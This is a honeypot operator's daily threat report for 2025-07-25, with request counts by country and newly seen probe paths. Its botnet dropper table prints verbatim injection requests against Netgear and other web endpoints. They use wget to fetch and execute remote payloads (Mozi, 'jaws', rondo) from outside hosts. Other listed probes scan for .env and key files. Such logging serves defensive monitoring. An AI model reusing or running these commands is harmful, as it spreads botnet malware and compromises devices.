Skip to main content
  1. Daily-Posts/

Report: 2025-07-25

·361 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-25
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 19 new requests that have never been observed before (these were added to the monitored request database.).

A total of 504 requests were recorded during the day, originating from 5 different countries, with a peak of 139 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country

botnet_dropper_behaviour
#

remote_addrrequest
122.96.48.166GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.33.10.178:37321/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
8.219.182.182GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.217.42GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.143.16GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.135.194.11GET /board.cgi?cmd=wget%20-qO-%20http%3A%2F%2F38.59.219.27%2Frondo.dcn.sh%7Csh%3B HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
84GET /boaform/form_loid_burning HTTP/1.1
103POST /boaform/admin/formPing HTTP/1.1
1471GET /releases/.env HTTP/1.1
1481GET /test/.env.aws HTTP/1.1
1511GET /test/.env.old HTTP/1.1
1521GET /test/.env.crt HTTP/1.1
1531GET /stagingEnv.sh HTTP/1.1
1551GET /variables.env HTTP/1.1
1561GET /statisch/.env HTTP/1.1
1571GET /upload/.env.1 HTTP/1.1
1751GET /server/.env.1 HTTP/1.1
1761GET /server/.env.2 HTTP/1.1
1771GET /spring/env.py HTTP/1.1
1791GET /previous/.env HTTP/1.1
1801GET /tmp/.env.prod HTTP/1.1
1821GET /test/.env.log HTTP/1.1
1881GET /keys/env.json HTTP/1.1
1891GET /env/email.env HTTP/1.1
2481\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\x17f\xF7\x7F\x00\x00P\xF8\xD6\x9B\xC9\x00\x00\x00\xE0\x81<f\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01

country_iso_code
#

number_of_occurencecountry_iso_code
0139GB
1112TW
276US
331NL
429SG
523BG
620PL
718DE
813HK
99SC
106MU
113KZ
122IR
132PT
142CA
152AR
162RU
172BR
181ID
191ES
201BE
211CN
221KH
231KR
241RO
251IN
261JP
271SK
281BD
291FR
301ZA

Related

Report: 2025-07-24
·340 words
Repport Daily
Report: 2025-07-23
·292 words
Repport Daily
Report: 2025-07-22
·296 words
Repport Daily